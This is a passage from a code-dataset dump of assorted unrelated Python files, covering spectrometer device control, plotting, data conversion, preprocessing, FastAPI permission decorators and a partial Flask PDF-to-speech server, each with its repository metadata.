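# ---------------------------------------------------------------------------\n# Aside: every getter in this class repeats the same try/except envelope; a\n# small wrapper like this would centralize it. Illustrative sketch only, not\n# part of the original module (the usage line assumes a connected device).\ndef _safe_call(action, label):\n    # action: zero-argument callable that touches the hardware\n    # label:  human-readable name used in the error strings\n    try:\n        return {'Res_Value': action(), 'Error': None}\n    except Exception as exc:\n        return {'Res_Value': None, 'Error': 'Ran into error while trying to %s (%s)' % (label, exc)}\n# usage sketch: _safe_call(lambda: device.hardware.get_detector_gain(), 'get gain')\n# ---------------------------------------------------------------------------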
{e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get gain.\"}\n\n def set_gain(self, gain_value):\n try:\n gain_value = float(gain_value)\n self.device.hardware.set_detector_gain(gain_value)\n self.update_settings()\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_gain for gain_value of {type(gain_value)}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid type for gain of {type(gain_value)}\"}\n\n def set_int_time(self, int_value):\n try:\n int_value = float(int_value)\n self.device.change_setting(\"integration_time_ms\",int_value)\n self.update_settings()\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_int_time for int_value of {type(int_value)}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid type for integration time of {type(int_value)}\"}\n except ValueError:\n logger.error(f\"Device Manager: Invalid value while in set_int_time for int_value of {int_value}\")\n return {\"Res_Value\": False, \"Error\": f\"Invalid value for integration time of {int_value}\"}\n\n def get_int_time(self, not_used):\n try:\n res = {\"Res_Value\": self.device.hardware.get_integration_time_ms(), \"Error\": None}\n logger.info(f\"Device Manager: Received integration time of {res['Res_Value']}\")\n return res\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get int time {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get int time\"}\n\n def get_spectra(self, not_used):\n try:\n self.device.acquire_data()\n return {\"Res_Value\": self.device.acquire_data().spectrum, \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get spectra {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get spectra\"}\n\n def get_roi(self, not_used):\n try:\n start_roi = self.device.settings.eeprom.roi_horizontal_start\n end_roi = self.device.settings.eeprom.roi_horizontal_end\n return {\"Res_Value\": (start_roi, end_roi), \"Error\": None}\n except Exception as e:\n logger.error(f\"Device Manager: Ran into error while trying to get roi {e}\")\n return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get roi\"}\n\n def set_roi(self, roi_values):\n try:\n start_roi, end_roi = roi_values.split(',')\n self.device.hardware.set_vertical_binning([int(start_roi), int(end_roi)])\n return {\"Res_Value\": True, \"Error\": None}\n except TypeError:\n logger.error(f\"Device Manager: Invalid type while in set_roi for roi values of {type(roi_values)}\")\n return {\"Res_Value\": False, \"Error\": f\"Received invalid roi type, start type of {type(roi_values)}\"}\n except ValueError:\n logger.error(f\"Device Manager: Invalid value for roi values {roi_values}\")\n return {\"Res_Value\": False, \"Error\": f\"Received invalid roi values of {roi_values}\"}\n except AttributeError:\n logger.error(f\"Device Manager: Attribute error in set_roi for value of {roi_values}\")\n return {\"Res_Value\": False, \"Error\": f\"Received invalid roi values of {roi_values}\"}\n\n def set_laser(self, enabled):\n try:\n if enabled == '1':\n self.device.hardware.set_laser_enable(True)\n return {\"Res_Value\": True, \"Error\": None}\n else:\n self.device.hardware.set_laser_enable(False)\n return {\"Res_Value\": False, \"Error\": None}\n except Exception as e:\n try:\n 
self.device.hardware.set_laser_enable(False)\n            except:\n                pass\n            logger.error(f\"Device Manager: Ran into error while trying to set laser {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to set laser\"}\n\n    def set_laser_watchdog(self,timeout):\n        try:\n            self.device.hardware.set_laser_watchdog_sec(int(timeout))\n            return {\"Res_Value\": True, \"Error\": None}\n        except TypeError:\n            logger.error(f\"Device Manager: Invalid type while in set_laser_watchdog for timeout of {type(timeout)}\")\n            return {\"Res_Value\": False, \"Error\": f\"Invalid type for watchdog timeout of {type(timeout)}\"}\n\n    def set_raman_delay(self,delay_time):\n        try:\n            self.device.hardware.set_raman_delay_ms(int(delay_time))\n            return {\"Res_Value\": True, \"Error\": None}\n        except TypeError:\n            logger.error(f\"Device Manager: Invalid type while in set_raman_delay for delay_time of {type(delay_time)}\")\n            return {\"Res_Value\": False, \"Error\": f'Invalid type for raman delay time of {type(delay_time)}'}\n\n    def get_laser_state(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.hardware.get_laser_enable(), \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get laser state {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get laser state\"}\n\n    def get_watch_delay(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.hardware.get_laser_watchdog_sec(), \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get laser watchdog delay {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get laser watchdog delay\"}\n\n    def get_raman_delay(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.hardware.get_raman_delay_ms(), \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get raman delay {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get raman delay\"}\n\n    def get_raman_mode(self, not_used):\n        try:\n            return {\"Res_Value\": self.device.hardware.get_raman_mode_enable_NOT_USED(), \"Error\": None}\n        except Exception as e:\n            logger.error(f\"Device Manager: Ran into error while trying to get raman mode {e}\")\n            return {\"Res_Value\": None, \"Error\": \"Ran into error while trying to get raman mode\"}\n","repo_name":"WasatchPhotonics/RPi-Communication","sub_path":"deviceManager.py","file_name":"deviceManager.py","file_ext":"py","file_size_in_byte":13699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13983977081","text":"from threading import Thread\nimport time\nimport os\nclass Printer(Thread):\n    def run(self):\n        for i in range(100):\n            print(i)\n            time.sleep(1)\n    \nclass FileHandler:\n    def __init__(self,name):\n        self.name = name\n        self.file = open(self.name,\"w\")\n        self.file.close()\n    def read(self):\n        try:\n            self.file = open(self.name,\"r\")\n        except:\n            open(self.name,\"w\").close()\n            return self.read()\n        print(self.file.read())\n        self.file.close()\n        input(\"\")\n\n    def write(self,text):\n        self.file = open(self.name,\"a\")\n        self.file.write(text+\"\\n\")\n        self.file.close()\n\n\nprinter = Printer()\nprinter.start()\n\nhandler = FileHandler(\"test12345.txt\")\nexitFlag = False\n\nwhile(not exitFlag):\n    os.system(\"clear\")\n    print('''\n    ---- MENU ----\n    1. READ\n    2. WRITE\n    3. 
EXIT\n    '''\n    )\n    try:\n        choice = int(input(\"Enter Choice: \"))\n    except ValueError:\n        choice = -1\n    if choice == 1:\n        handler.read()\n    elif choice == 2:\n        handler.write(input(\"Enter Text to Write: \"))\n    elif choice == 3:\n        exitFlag = True\n    else:\n        print(\"Incorrect Choice, do again\")\n        input(\"\")\n\n    \n","repo_name":"aijazahmadwani/python_IMCA-4-sem","sub_path":"Python_Programs/asgn1.py","file_name":"asgn1.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20853575296","text":"#!/usr/bin/python3\nfrom sys import argv\nif __name__ == \"__main__\":\n    ln = len(argv) - 1\n    if ln == 0:\n        print(\"0 arguments.\")\n    elif ln > 0:\n        if ln == 1:\n            print(\"{} argument:\".format(ln))\n        elif ln > 1:\n            print(\"{} arguments:\".format(ln))\n        for i in range(ln):\n            print(\"{}: {}\".format(i + 1, argv[i + 1]))\n","repo_name":"ibnAbuMahdi/alx-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75341252328","text":"'''\n\n    Given an array nums and a value val, remove in place all elements whose value equals val and return the new length of the array.\n\n    Do not use extra array space: you must modify the input array in place, using only O(1) extra memory.\n\n    The order of elements may be changed, and the elements beyond the new length do not matter.\n\n'''\n\nclass Solution:\n    def removeElement(self, num, val):\n        result = 0\n        if len(num) == 0:\n            return result\n        front_point = 0\n        back_point = len(num) - 1\n        count = 0\n        while front_point < back_point:\n            if num[front_point] == val:\n                temp = num[back_point]\n                num[back_point] = num[front_point]\n                num[front_point] = temp\n                back_point -= 1\n            else:\n                count += 1\n                front_point += 1\n        if num[front_point] != val:\n            count += 1\n        result = len(num[0:count])\n        return result\n\n\nif __name__ == '__main__':\n    num = [0, 1, 2, 2, 3, 0, 4, 2]\n    val = 2\n    ss = Solution()\n    print(ss.removeElement(num, val))\n","repo_name":"yudongnan23/algorithmRoad","sub_path":"python/pyleetcode/array_string/pointer_removeElement.py","file_name":"pointer_removeElement.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36493084701","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nmethod_order_list = [\n    \"Numpy\",\n    \"Cupy\",\n    #\"CupySerialSystem\",\n    #\"CupyRaySystem\",\n    \"CupyParallelSystem\",\n    \"CupyNcclActorSystem\",\n]\n\n\ndef method2order(method):\n    return method_order_list.index(method)\n\n\ndef method2color(method):\n    return \"C%d\" % method_order_list.index(method)\n\n\nshow_name_table = {\n    #\"CupyRaySystem\": \"Cupy + ObjectStore\",\n    \"CupyParallelSystem\": \"Ours (1 node, 4 GPUs)\",\n    \"CupyNcclActorSystem\": \"Ours (2 nodes, 8 GPUs)\",\n}\n\n\ndef show_name(method):\n    return show_name_table.get(method, method)\n\n\ndef draw_grouped_bar_chart(\n    data,\n    baseline=None,\n    output=\"out.png\",\n    yscale_log=False,\n    yticks=None,\n    y_max=None,\n    legend_bbox_to_anchor=None,\n    legend_nrow=None,\n    figure_size=None,\n    figax=None,\n    draw_ylabel=True,\n    draw_legend=True,\n    data_error_bar=None,\n    title=None,\n):\n    \"\"\"\n    Parameters\n    data: OrderedDict[workload_name -> OrderedDict[method] -> cost]]\n    \"\"\"\n    width = 1\n    gap = 1.5\n    fontsize = 19\n    xticks_font_size = fontsize - 2\n\n    figure_size = figure_size or (11, 4)\n    legend_bbox_to_anchor = legend_bbox_to_anchor or (0.45, 1.25)\n\n    all_methods = set()\n    legend_set = {}\n\n    if figax is None:\n        fig, ax = 
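# ---------------------------------------------------------------------------\n# Aside: the same remove-element task as the Solution class above, in the\n# compact overwrite form; a sketch for comparison, not from the original\n# record.\ndef _remove_element(nums, val):\n    write = 0  # next slot for a value we keep\n    for x in nums:\n        if x != val:\n            nums[write] = x\n            write += 1\n    return write  # new logical length\n# _remove_element([0, 1, 2, 2, 3, 0, 4, 2], 2) -> 5\n# ---------------------------------------------------------------------------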
plt.subplots()\n axes = []\n axes.append(ax)\n else:\n # for drawing subplot\n ax = figax\n\n x0 = 0\n xticks = []\n xlabels = []\n\n workloads = list(data.keys())\n for wkl in workloads:\n ys = []\n colors = []\n\n methods = list(data[wkl].keys())\n\n if baseline in data[wkl]:\n baseline_cost = data[wkl][baseline]\n else:\n # normalize to best library\n baseline_cost = 1\n # for method in methods:\n # if data[wkl][method] < baseline_cost:\n # baseline_cost = data[wkl][method]\n\n methods.sort(key=lambda x: method2order(x))\n for method in methods:\n relative_speedup = data[wkl][method] / baseline_cost\n if yticks is None:\n ys.append(relative_speedup)\n else:\n ys.append(max(relative_speedup, yticks[0] * 1.1))\n colors.append(method2color(method))\n\n # draw the bars\n xs = np.arange(x0, x0 + len(ys))\n\n if data_error_bar:\n yerrs = [data_error_bar[wkl][method] for method in methods]\n bars = ax.bar(\n xs, ys, yerr=yerrs, width=width, color=colors, ecolor=\"dimgray\"\n )\n else:\n bars = ax.bar(xs, ys, width=width, color=colors)\n\n for method, bar_obj in zip(methods, bars):\n all_methods.add(method)\n if method not in legend_set:\n legend_set[method] = bar_obj\n\n # tick and label\n x0 += len(ys) + gap\n\n xticks.append(x0 - gap - len(ys) * width / 2.0 - width / 2.0)\n xlabels.append(show_name(wkl))\n\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, fontsize=xticks_font_size)\n plt.tick_params(axis=\"x\", which=\"both\", bottom=\"off\", top=\"off\")\n\n if draw_ylabel is True:\n ax.set_ylabel(\"Time Cost (s)\", fontsize=fontsize)\n elif isinstance(draw_ylabel, str):\n ax.set_ylabel(draw_ylabel, fontsize=fontsize)\n\n if yscale_log:\n ax.set_yscale(\"log\", basey=2)\n if yticks is not None:\n ax.set_yticks(yticks)\n if y_max:\n ax.set_ylim(top=y_max)\n\n from matplotlib.ticker import FormatStrFormatter\n\n ax.set_yticklabels(ax.get_yticks(), fontsize=fontsize)\n ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.2f\"))\n ax.yaxis.grid(True)\n #ax.grid(True)\n ax.set_axisbelow(True) # grid lines are behind the rest\n ax.tick_params(bottom=False, top=False, right=False)\n\n # put legend outside the plot\n all_methods = list(all_methods)\n all_methods.sort(key=lambda x: method2order(x))\n\n ax.set_xlabel(\"Dataset Size\", fontsize=fontsize)\n ax.set_title(title, fontsize=fontsize, pad=60.0)\n\n if draw_legend:\n legend_nrow = legend_nrow or 2\n ncol = (len(all_methods) + legend_nrow - 1) // legend_nrow\n ax.legend(\n [legend_set[x] for x in all_methods],\n [show_name(x) for x in all_methods],\n fontsize=fontsize - 1,\n loc=\"upper center\",\n bbox_to_anchor=legend_bbox_to_anchor,\n ncol=ncol,\n handlelength=1.0,\n handletextpad=0.5,\n columnspacing=1.1,\n )\n\n if figax is None:\n fig.set_size_inches(figure_size)\n fig.savefig(output, bbox_inches=\"tight\")\n print(\"Output the plot to %s\" % output)\n\n\ndef read_data(in_file):\n data = {}\n\n for line in open(in_file):\n if line.startswith('#'):\n continue\n items = [x.strip() for x in line.split(\",\")]\n library, N, cost, cv = items\n N, cost, cv = [eval(x) for x in [N, cost, cv]]\n\n gb = N * 1000 * 4 / 1e9\n if gb < 1:\n workload_name = \"%.1f GB\" % gb\n else:\n workload_name = \"%.0f GB\" % gb\n\n if cost < 0:\n continue\n if library not in method_order_list:\n continue\n\n if workload_name not in data:\n data[workload_name] = {}\n\n data[workload_name][library] = cost\n\n return data\n\n\nif __name__ == \"__main__\":\n data = read_data(\"result_bop.csv\")\n draw_grouped_bar_chart(\n data, legend_nrow=1, title=\"Compute 
$X^TX$\",\n output=\"bop.png\",\n yscale_log=True,\n yticks=[0.0625, 0.125, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0],\n )\n\n data = read_data(\"result_lr.csv\")\n draw_grouped_bar_chart(\n data, legend_nrow=1, title=\"One Logistic Regression Training Step\",\n output=\"lr.png\",\n yscale_log=True,\n yticks=[0.0625, 0.125, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0],\n )\n","repo_name":"merrymercy/nums","sub_path":"scripts/plot_all.py","file_name":"plot_all.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"41842851751","text":"import mido\nfrom mido import MidiFile, MidiTrack, Message\nimport numpy as np\n\ndef grayscale_to_midi(image, output_file):\n with MidiFile() as midi_file:\n track = MidiTrack()\n midi_file.tracks.append(track)\n\n for row in image:\n for pixel_value in row:\n # Map pixel brightness to pitch\n pitch = int(np.interp(pixel_value, [0, 255], [40, 90]))\n\n # Map pixel brightness to note duration (arbitrary)\n duration = int(np.interp(pixel_value, [0, 255], [50, 200]))\n\n # Add a note message to the track\n track.append(Message('note_on', note=pitch, velocity=64, time=0))\n track.append(Message('note_off', note=pitch, velocity=64, time=duration))\n\n # Save the MIDI file\n midi_file.save(output_file)\n","repo_name":"fraking00/LinesToMusic","sub_path":"grayscaleToMidi.py","file_name":"grayscaleToMidi.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23673677188","text":"import sys\nimport numpy as np\nimport tables as tb\nimport netCDF4 as nc\n\ndef int2ymd(iyear):\n f, y = np.modf(iyear/10000.)\n d, m = np.modf(f*100)\n return (int(y), int(m), int(d*100))\n\n\ndef num2year(iyear):\n \"\"\"Numeric representation of year to decimal year.\"\"\"\n iyear = np.asarray([int(y) for y in iyear])\n fyear = lambda y, m, d: y + (m - 1)/12. 
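# ---------------------------------------------------------------------------\n# Aside: what the int2ymd/num2year pair computes, traced for one assumed date\n# code: 20071216 -> (2007, 12, 16) -> 2007 + 11/12 + 16/365.25.\n_code = 20071216\n_y, _m, _d = _code // 10000, (_code // 100) % 100, _code % 100\n_decimal_year = _y + (_m - 1) / 12.0 + _d / 365.25  # ~2007.96\n# ---------------------------------------------------------------------------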
+ d/365.25\n ymd = [int2ymd(iy) for iy in iyear]\n return [fyear(y,m,d) for y,m,d in ymd]\n\n\nif len(sys.argv) < 3:\n raise IOError('need `input` and `output` file names!')\n\nfname_in = sys.argv[1]\nfname_out = sys.argv[2]\n\nh5f = tb.openFile(fname_in, 'r')\ntime = h5f.root.time_all[:]\nlon = h5f.root.lon[:]\nlat = h5f.root.lat[:]\ndh = h5f.root.dh_mean_all[:]\ndh_corr = h5f.root.dh_mean_corr_short_t9_all[:]\ndg = h5f.root.dg_mean_all[:]\nnt, ny, nx = dh.shape\n\ntime = num2year(time)\n#lon[lon>180] -= 360\n\nncf = nc.Dataset(fname_out, 'w', format='NETCDF4')\nncf.createDimension('time', nt)\nncf.createDimension('latitude', ny) \nncf.createDimension('longitude', nx)\n\ndh2 = ncf.createVariable('dh','f8',('time', 'latitude', 'longitude',))\ndh_corr2 = ncf.createVariable('dh_corr','f8',('time', 'latitude', 'longitude',))\ndg2 = ncf.createVariable('dg','f8',('time', 'latitude', 'longitude',))\ntime2 = ncf.createVariable('time','f8',('time',))\nlon2 = ncf.createVariable('longitude','f8',('longitude',))\nlat2 = ncf.createVariable('latitude','f8',('latitude',))\n\n\ndh[np.abs(dh)>5] = np.nan\ndh_corr[np.abs(dh_corr)>10] = np.nan\n\n'''\ndh[dh==0] = np.nan\ndh_corr[dh_corr==0] = np.nan\ndg[dg==0] = np.nan\n'''\ndh[np.isnan(dh)] = 0\ndh_corr[np.isnan(dh_corr)] = 0\ndg[np.isnan(dg)] = 0 \n\ndh2[:] = dh[:]\ndh_corr2[:] = dh_corr[:]\ndg2[:] = dg[:]\ntime2[:] = time[:]\nlon2[:] = lon[:]\nlat2[:] = lat[:]\n\nh5f.close()\nncf.close()\n","repo_name":"fspaolo/misc-code","sub_path":"misc/hdf2nc.py","file_name":"hdf2nc.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"9297870652","text":"\"\"\"\nFunctions for pre-processing of data.\n\"\"\"\nimport logging\nfrom typing import Union\nimport pandas as pd\nfrom nowcastlib.pipeline.structs import config\nfrom nowcastlib.pipeline import utils as pipeline_utils\nfrom nowcastlib.pipeline.process import utils as process_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef preprocess_datasource(options: config.DataSource):\n \"\"\"\n Runs preprocessing on a given data source given options outlined\n in the input DataSource instance.\n\n Parameters\n ----------\n options : nowcastlib.pipeline.structs.config.DataSource\n\n Returns\n -------\n pandas.core.frame.DataFrame\n the resulting processed dataframe\n \"\"\"\n logger.debug(\"Preprocessing %s...\", options.name)\n index_field = next(field for field in options.fields if field.is_date)\n logger.debug(\"Reading file...\")\n data_df = pd.read_csv(\n options.path,\n usecols=[field.field_name for field in options.fields],\n index_col=index_field.field_name,\n parse_dates=False,\n comment=options.comment_format,\n )\n data_df.index = pd.to_datetime(data_df.index, format=index_field.date_format)\n data_df = data_df[ # pylint: disable=unsubscriptable-object\n ~data_df.index.duplicated(keep=\"last\")\n ]\n data_df.sort_index(inplace=True)\n for field in options.fields:\n logger.debug(\"Processing field %s of %s...\", field.field_name, options.name)\n proc_options = field.preprocessing_options\n if proc_options is not None:\n # next two lines handle whether user wishes to overwrite field or not\n computed_field_name = pipeline_utils.build_field_name(\n proc_options, field.field_name\n )\n data_df[computed_field_name] = data_df[field.field_name].copy()\n data_df[computed_field_name] = process_utils.process_field(\n data_df[computed_field_name], proc_options, True\n )\n logger.debug(\"Dropping NaNs...\")\n data_df = 
data_df.dropna()\n    if options.preprocessing_output is not None:\n        logger.debug(\"Serializing preprocessing output...\")\n        pipeline_utils.handle_serialization(data_df, options.preprocessing_output)\n    return data_df\n\n\ndef preprocess_dataset(options: config.DataSet):\n    \"\"\"\n    Runs preprocessing on a given set of data sources given options outlined\n    in the input DataSet instance.\n\n    Parameters\n    ----------\n    options : nowcastlib.pipeline.structs.config.DataSet\n\n    Returns\n    -------\n    list[pandas.core.frame.DataFrame]\n        list containing each of the resulting processed dataframes\n    \"\"\"\n    logger.info(\"Preprocessing dataset...\")\n    processed_dfs = []\n    for ds_config in options.data_sources:\n        processed_dfs.append(preprocess_datasource(ds_config))\n    logger.info(\"Dataset preprocessing complete.\")\n    return processed_dfs\n","repo_name":"thesofakillers/nowcastlib","sub_path":"nowcastlib/pipeline/process/preprocess/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9880295957","text":"# Create a list of arbitrary real numbers; the user specifies how many elements it has.\n# Write a program that finds the difference between the maximum and minimum values of the elements' fractional parts.\nimport random\n\ndef random_list_without_int (a):\n    spisok = []\n    for i in range(a):\n        spisok.append(round(random.uniform(0, 10),2))\n    print(spisok)\n    for i in range(len(spisok)):\n        spisok[i] = round(spisok[i]%1,2)\n    print(spisok)\n    return spisok\n\ndef min_max_diff_in_list (list):\n    min = list[0]\n    max = list[0]\n    differ = 0\n    for i in range(len(list)):\n        if min > list[i]:\n            min = list[i]\n        if max < list[i]:\n            max = list[i]\n    differ = max - min\n    print(f'Min = {min}, Max = {max}, Difference = {round(differ,2)}')\n    return min, max, differ\n\n\nn = int(input('enter the number of elements in the list '))\n\nmin_max_diff_in_list(random_list_without_int(n))","repo_name":"GadisovTmr/pythonStudy","sub_path":"All/practic/dz3/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5499251716","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport logging\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\n\ndef show_statistics(encoded_dataset, dataset_name):\n    all_lens = [item['metadata']['len'] for item in encoded_dataset]\n    all_lens = pd.Series(all_lens, dtype=int)\n    logger.info(f\"length of {dataset_name}: {str(all_lens.describe())}\")","repo_name":"HKUNLP/icl-ceil","sub_path":"src/utils/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"}
+{"seq_id":"28194840889","text":"from functools import wraps\nfrom fastapi import HTTPException\n\ndef owner_or_superuser_access(model_param_name, user_param_name):\n    \"\"\"\n    The decorated function must have two parameters, 'user' and 'model_name'.\n    The equality 'model_name.advertisement == user.id' is checked;\n    on a mismatch, an access-denied error is raised.\n    \"\"\"\n    def decor(func):\n        @wraps(func)\n        async def wrapper(*args, **kwargs):\n            advertisement = kwargs.get(model_param_name)\n            user = kwargs.get(user_param_name)\n            if advertisement.user.id != user.id and not user.is_superuser:\n                raise HTTPException(status_code=401, detail=\"You have no access\")\n            return await func(*args, **kwargs)\n        return wrapper\n    return decor\n\ndef not_banned_access(func):\n    \"\"\"\n    Check whether the user is banned\n    \"\"\"\n    @wraps(func)\n    async def wrapper(*args, **kwargs):\n        user = kwargs.get('user')\n        if user.is_banned:\n            raise HTTPException(status_code=401, detail=\"Your profile is banned\")\n        return await func(*args, **kwargs)\n    return wrapper\n\ndef superuser_access(func):\n    \"\"\"\n    Check for superuser rights\n    \"\"\"\n    @wraps(func)\n    async def wrapper(*args, **kwargs):\n        user = kwargs.get('user')\n        if not user.is_superuser:\n            raise HTTPException(status_code=401, detail=\"You need superuser access\")\n        return await func(*args, **kwargs)\n    return wrapper","repo_name":"ilnar1995/fastapi_advertisements1","sub_path":"src/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34906003594","text":"from matplotlib import pyplot as plt\nimport csv\n\n\ncolors=['b', 'g', 'r']\ndata=[[], [], []]\nj=2\nif j==0:\n    stringy=\"Mass (Solar)\"\n    bins=[90, 95, 99]\nif j==1:\n    stringy=\"Age (GYR)\"\n    bins=[100, 100, 100]\nif j==2:\n    stringy=\"Temperature (Kelvin)\"\n    bins=[list(range(0, 2550, 150))+[2550], list(range(0, 2550, 150))+[2550], list(range(0, 2550, 150))+[2550]]\ni=\"0.5\"\nmodel_string= \"saumonmarley2008\"\nbirthrate= \"const\"\ns1=model_string+\"_\"+i+\"_\"+birthrate\nstring=\"/Users/yadukrishnaraghu/Files/Research/Brown-Dwarf-Simulation-Code-main/Essential-Simulation-Files/Bin/\"+s1\nstring1=string+\"_1.txt\"\nstring2=string+\"_2.txt\"\nstring3=string+\"_3.txt\"\nwith open(string1, mode='r') as employee_file:\n    read = csv.reader(employee_file)\n    for i in read:\n        data[0].append(float(i[j]))\n\nwith open(string2, mode='r') as employee_file:\n    read = csv.reader(employee_file)\n    for i in read:\n        data[1].append(float(i[j]))\n\nwith open(string3, mode='r') as employee_file:\n    read = csv.reader(employee_file)\n    for i in read:\n        data[2].append(float(i[j]))\n\n\n\n\nplt.hist(data[0], histtype='step', bins=bins[0], color=\"black\")\nplt.hist(data[1], histtype='step', bins=bins[1], color=\"blue\")\nplt.hist(data[2], histtype='step', bins=bins[2], color=\"red\")\nplt.grid()\nplt.xlabel(stringy)\nplt.ylabel('Number')\nplt.gca().invert_xaxis()\nplt.title(s1)\n\nplt.show()","repo_name":"jgrigorian23/Brown-Dwarf-Simulation-Code","sub_path":"Essential/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3031712023","text":"import logging\nimport os\nimport shutil\n\nimport albumentations as A\nfrom pytorch_lightning import Callback\n\n__all__ = [\n    \"SavePolicy\",\n]\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SavePolicy(Callback):\n    def __init__(self, dirpath=None, latest_policy_filename=\"latest.json\"):\n        self.dirpath = dirpath or os.path.join(os.getcwd(), \"policy\")\n        self.latest_policy_filepath = os.path.join(self.dirpath, latest_policy_filename)\n        os.makedirs(self.dirpath, exist_ok=True)\n\n    def on_epoch_end(self, trainer, pl_module):\n        epoch = trainer.current_epoch\n        datamodule = trainer.datamodule\n        cfg = pl_module.cfg\n        transform = pl_module.policy_model.create_transform(\n            input_dtype=cfg.data.input_dtype,\n            preprocessing_transforms=datamodule.get_preprocessing_transforms(),\n        )\n        policy_file_filepath = os.path.join(self.dirpath, f\"epoch_{epoch}.json\")\n        A.save(transform, policy_file_filepath)\n        
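The SavePolicy callback above serializes each epoch's augmentation policy with A.save. As a minimal sketch (not part of the source repo), such a file can be reloaded with albumentations' A.load and applied directly; the 'policy/latest.json' path is hypothetical, matching the callback's default dirpath and latest_policy_filename:

import albumentations as A
import numpy as np

# Hypothetical path mirroring SavePolicy's defaults.
transform = A.load("policy/latest.json")

# Apply the reloaded policy to a dummy uint8 RGB image.
image = np.random.randint(0, 256, (100, 100, 3), dtype=np.uint8)
augmented = transform(image=image)["image"]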
shutil.copy2(policy_file_filepath, self.latest_policy_filepath)\n log.info(\n f\"Policy is saved to {policy_file_filepath}. \"\n f\"{self.latest_policy_filepath} now also contains this policy.\"\n )\n","repo_name":"albumentations-team/autoalbument","sub_path":"autoalbument/callbacks/save_policy.py","file_name":"save_policy.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"53"} +{"seq_id":"35048170096","text":"\nimport sys, os\n\n# Disable\n\nimport base64\nimport io\nimport PyPDF2\nfrom flask import Flask, request, jsonify, make_response\nfrom flask_cors import CORS\nfrom serverPdf2Wav import pdf2wavServer\nfrom cache.cache import RedisCache\nimport random\nimport ast\nimport string\nimport json\n\n\napplication = app = Flask(__name__)\nUserRegisterDB = RedisCache(\"127.0.0.1:6379\")\n\napp.config['UPLOAD_EXTENSIONS'] = ['.docx', '.doc', '.txt', '.pdf', '.html']\ncors = CORS(app)\n\n\ndef _build_cors_preflight_response():\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n response.headers.add(\"Access-Control-Allow-Headers\", \"*\")\n response.headers.add(\"Access-Control-Allow-Methods\", \"*\")\n return response\n\n\n@app.route('/')\n@app.route('/register',methods=['POST'])\ndef register():\n if request.method == \"POST\":\n print(request.json)\n try:\n username = request.json['username']\n password = request.json['password']\n\n\n token = UserRegisterDB.put(username,password)\n return {\"username\":username ,\"password\":password,\"token\":token}\n\n except Exception as e:\n print (e)\n return jsonify(e)\n\n\ndef randomStringHash(N:int) -> str:\n\n sHash = ''.join(random.choices(string.ascii_uppercase + string.digits, k = N))\n return sHash\n\n\n\n@app.route('/pdf2wav', methods=['POST', 'OPTIONS'])\ndef extractwav():\n if request.method == 